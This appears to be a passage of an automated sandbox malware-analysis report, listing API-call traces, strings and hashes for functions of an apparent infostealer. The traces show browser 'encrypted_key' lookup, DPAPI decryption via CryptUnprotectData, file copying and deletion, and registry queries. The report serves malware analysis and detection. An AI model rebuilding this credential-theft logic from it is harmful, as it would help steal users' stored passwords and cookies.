                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_WGo3ga1AL9.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                                                                                                                              • String ID: @
                                                                                                                                              • API String ID: 3404098578-2766056989
                                                                                                                                              • Opcode ID: 878a90f34e096d30e7d89448c69a574e23fa6b892c1598a4a852eafceae412f3
                                                                                                                                              • Instruction ID: 198c605b63268064c6e3321c907f2861ebf30c0b4d659eb8408d118d522d9ff8
                                                                                                                                              • Opcode Fuzzy Hash: 878a90f34e096d30e7d89448c69a574e23fa6b892c1598a4a852eafceae412f3
                                                                                                                                              • Instruction Fuzzy Hash: 88014BF0D44308BAEB10DFE0DD4ABAEBB78AB14705F20849EE604B62D0D6785581875D
                                                                                                                                              Function 0040A430 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 97COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                                                                                                                • Part of subcall function 0040A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040A13C
                                                                                                                                                • Part of subcall function 0040A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0040A161
                                                                                                                                                • Part of subcall function 0040A110: LocalAlloc.KERNEL32(00000040,?), ref: 0040A181
                                                                                                                                                • Part of subcall function 0040A110: ReadFile.KERNEL32(000000FF,?,00000000,00410447,00000000), ref: 0040A1AA
                                                                                                                                                • Part of subcall function 0040A110: LocalFree.KERNEL32(00410447), ref: 0040A1E0
                                                                                                                                                • Part of subcall function 0040A110: CloseHandle.KERNEL32(000000FF), ref: 0040A1EA
                                                                                                                                                • Part of subcall function 00418FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418FE2
                                                                                                                                              • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 0040A489
                                                                                                                                                • Part of subcall function 0040A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O@,00000000,00000000), ref: 0040A23F
                                                                                                                                                • Part of subcall function 0040A210: LocalAlloc.KERNEL32(00000040,?,?,?,00404F3E,00000000,?), ref: 0040A251
                                                                                                                                                • Part of subcall function 0040A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O@,00000000,00000000), ref: 0040A27A
                                                                                                                                                • Part of subcall function 0040A210: LocalFree.KERNEL32(?,?,?,?,00404F3E,00000000,?), ref: 0040A28F
                                                                                                                                              • memcmp.MSVCRT(?,DPAPI,00000005), ref: 0040A4E2
                                                                                                                                                • Part of subcall function 0040A2B0: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0040A2D4
                                                                                                                                                • Part of subcall function 0040A2B0: LocalAlloc.KERNEL32(00000040,00000000), ref: 0040A2F3
                                                                                                                                                • Part of subcall function 0040A2B0: memcpy.MSVCRT(?,?,?), ref: 0040A316
                                                                                                                                                • Part of subcall function 0040A2B0: LocalFree.KERNEL32(?), ref: 0040A323
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2312969222.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_WGo3ga1AL9.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpymemcmpmemcpy
                                                                                                                                              • String ID: $"encrypted_key":"$DPAPI
                                                                                                                                              • API String ID: 3731072634-738592651
                                                                                                                                              • Opcode ID: 5a92e00c568d9231ddf6d72b2c2f1078ac796ca73026115f59224c7bf13c0533
                                                                                                                                              • Instruction ID: 27b9d937d1eb2b37959d1b0821c640950517226354c316aa9f1795df4e4508dc
                                                                                                                                              • Opcode Fuzzy Hash: 5a92e00c568d9231ddf6d72b2c2f1078ac796ca73026115f59224c7bf13c0533
                                                                                                                                              • Instruction Fuzzy Hash: 323152B6D00209ABCF04DBD4DC45AEFB7B8BF58304F44456AE901B7281E7389A54CB6A
                                                                                                                                              Function 00417F90 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417FC7
                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 00417FCE
                                                                                                                                              • RegOpenKeyExA.KERNEL32(80000002,0099C978,00000000,00020119,?), ref: 00417FEE
                                                                                                                                              • RegQueryValueExA.KERNEL32(?,009A0EA8,00000000,00000000,000000FF,000000FF), ref: 0041800F
                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00418022
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2312969222.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_WGo3ga1AL9.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3466090806-0
                                                                                                                                              • Opcode ID: 7a9c0ba5048ddb27ec33de3f8be0389340df971bddb9b3c1683f2c2c2fb7b9da
                                                                                                                                              • Instruction ID: 7366865410052b2090c980cb0782fc53e6cc971cacc9a0cbb18d91746b71e1a2
                                                                                                                                              • Opcode Fuzzy Hash: 7a9c0ba5048ddb27ec33de3f8be0389340df971bddb9b3c1683f2c2c2fb7b9da
                                                                                                                                              • Instruction Fuzzy Hash: 981151B1E45209EBD700CF94DD45FBFBBB9EB48B11F10421AF615A7280E77959048BA2
                                                                                                                                              Function 004012A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 004012B4
                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 004012BB
                                                                                                                                              • RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 004012D7
                                                                                                                                              • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012F5
                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 004012FF
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2312969222.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_WGo3ga1AL9.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3466090806-0
                                                                                                                                              • Opcode ID: 105a35557efbe30c530503ad4a66e3d917ab5a2bcfe7a77369b2bd71da3f475d
                                                                                                                                              • Instruction ID: b0bfc99e0bb5f41d030d85d97ebb5ad9faa7414484ca5a523084a8432581bb26
                                                                                                                                              • Opcode Fuzzy Hash: 105a35557efbe30c530503ad4a66e3d917ab5a2bcfe7a77369b2bd71da3f475d
                                                                                                                                              • Instruction Fuzzy Hash: D1013179E45209BFDB00DFD0DC49FAE7779EB48701F00419AFA05A7280E770AA008B91
                                                                                                                                              Function 0040A7D0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116libraryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GetEnvironmentVariableA.KERNEL32(00999610,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF,?,?,?,?,?,?,?,?,?,?,?,004102B3), ref: 0040A7ED
                                                                                                                                              • LoadLibraryA.KERNEL32(009A0DA8,?,?,?,?,?,?,?,?,?,?,?,004102B3), ref: 0040A876
                                                                                                                                                • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                                                                                                                • Part of subcall function 0041AB30: lstrlenA.KERNEL32(00000000,?,?,00415DA4,00420ADF,00420ADB,?,?,00416DB6,00000000,?,009996C0,?,004210F4,?,00000000), ref: 0041AB3B
                                                                                                                                                • Part of subcall function 0041AB30: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AB95
                                                                                                                                                • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                                                                                                                                • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                                                                                                                                • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                                                                                                                                • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                                                                                                                                • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                                                                                                                                • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                                                                                                                              • SetEnvironmentVariableA.KERNEL32(00999610,00000000,00000000,?,0042137C,?,004102B3,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,00420B0A), ref: 0040A862
                                                                                                                                              Strings
                                                                                                                                              • C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;, xrefs: 0040A7E2, 0040A7F6, 0040A80C
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2312969222.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_WGo3ga1AL9.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                                                                                                                                              • String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;
                                                                                                                                              • API String ID: 2929475105-3463377506
                                                                                                                                              • Opcode ID: 69c2d0e93ccfe8b8714ccc712de0d27dd78572f46db488cd3a641e4aafbcbfe0
                                                                                                                                              • Instruction ID: e2f153a25b0241b5b599166127738bab9ecbab10861abf647739b816a1383ce1
                                                                                                                                              • Opcode Fuzzy Hash: 69c2d0e93ccfe8b8714ccc712de0d27dd78572f46db488cd3a641e4aafbcbfe0
                                                                                                                                              • Instruction Fuzzy Hash: 63415BB1E0A2049BC704EBA5EC55BAE37B6AB08305F44552BF505A32E0FB386954CB67
                                                                                                                                              Function 0040A990 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                                                                                                                • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                                                                                                                                • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                                                                                                                                • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                                                                                                                                • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                                                                                                                                • Part of subcall function 00418CF0: GetSystemTime.KERNEL32(?,0099BC18,004205B6,?,?,?,?,?,?,?,?,?,004049B3,?,00000014), ref: 00418D16
                                                                                                                                                • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                                                                                                                                • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                                                                                                                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040AA11
                                                                                                                                              • lstrlenA.KERNEL32(00000000,00000000), ref: 0040AB2F
                                                                                                                                              • lstrlenA.KERNEL32(00000000), ref: 0040ADEC
                                                                                                                                                • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                                                                                                                                • Part of subcall function 0040A560: memcmp.MSVCRT(?,v20,00000003), ref: 0040A57D
                                                                                                                                              • DeleteFileA.KERNEL32(00000000), ref: 0040AE73
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2312969222.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_WGo3ga1AL9.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTimememcmp
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 257331557-0
                                                                                                                                              • Opcode ID: 858e40e9dc4053a420d1ea5b5d5ce001d27ac93553f60edba4b6100e8e79f79e
                                                                                                                                              • Instruction ID: 5dfe8597df33c788f82f0551f3ba8d02d272d38f024b71a471f8e3c501a58f6f
                                                                                                                                              • Opcode Fuzzy Hash: 858e40e9dc4053a420d1ea5b5d5ce001d27ac93553f60edba4b6100e8e79f79e
                                                                                                                                              • Instruction Fuzzy Hash: A9E134729111089BCB04FBA5DC66EEE7339AF14314F40855EF11672091EF387A9CCB6A
                                                                                                                                              Function 0040D880 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                                                                                                                • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                                                                                                                                • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                                                                                                                                • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                                                                                                                                • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                                                                                                                                • Part of subcall function 00418CF0: GetSystemTime.KERNEL32(?,0099BC18,004205B6,?,?,?,?,?,?,?,?,?,004049B3,?,00000014), ref: 00418D16
                                                                                                                                                • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                                                                                                                                • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                                                                                                                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040D901
                                                                                                                                              • lstrlenA.KERNEL32(00000000), ref: 0040DA9F
                                                                                                                                              • lstrlenA.KERNEL32(00000000), ref: 0040DAB3
                                                                                                                                              • DeleteFileA.KERNEL32(00000000), ref: 0040DB32
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2312969222.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_WGo3ga1AL9.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 211194620-0
                                                                                                                                              • Opcode ID: 4ab3b7582220b1787deb304735b5bc04cf647ad89348eee7fb2f520d824333e1
                                                                                                                                              • Instruction ID: 660f6b77f2ff2b442eb80c9f7963c7c0f8ff679996332a2a68bd7dee448c32b7
                                                                                                                                              • Opcode Fuzzy Hash: 4ab3b7582220b1787deb304735b5bc04cf647ad89348eee7fb2f520d824333e1
                                                                                                                                              • Instruction Fuzzy Hash: 28812572E111089BCB04FBA5EC66DEE7339AF14314F40455FF10662095EF387A98CB6A
                                                                                                                                              Function 0040F5A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                                                                                                                                • Part of subcall function 0040A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040A13C
                                                                                                                                                • Part of subcall function 0040A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0040A161
                                                                                                                                                • Part of subcall function 0040A110: LocalAlloc.KERNEL32(00000040,?), ref: 0040A181
                                                                                                                                                • Part of subcall function 0040A110: ReadFile.KERNEL32(000000FF,?,00000000,00410447,00000000), ref: 0040A1AA
                                                                                                                                                • Part of subcall function 0040A110: LocalFree.KERNEL32(00410447), ref: 0040A1E0
                                                                                                                                                • Part of subcall function 0040A110: CloseHandle.KERNEL32(000000FF), ref: 0040A1EA
                                                                                                                                                • Part of subcall function 00418FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418FE2
                                                                                                                                                • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                                                                                                                • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                                                                                                                                • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                                                                                                                                • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                                                                                                                                • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                                                                                                                                • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                                                                                                                                • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                                                                                                                              • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00421678,00420D93), ref: 0040F64C
                                                                                                                                              • lstrlenA.KERNEL32(00000000), ref: 0040F66B
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2312969222.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_WGo3ga1AL9.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
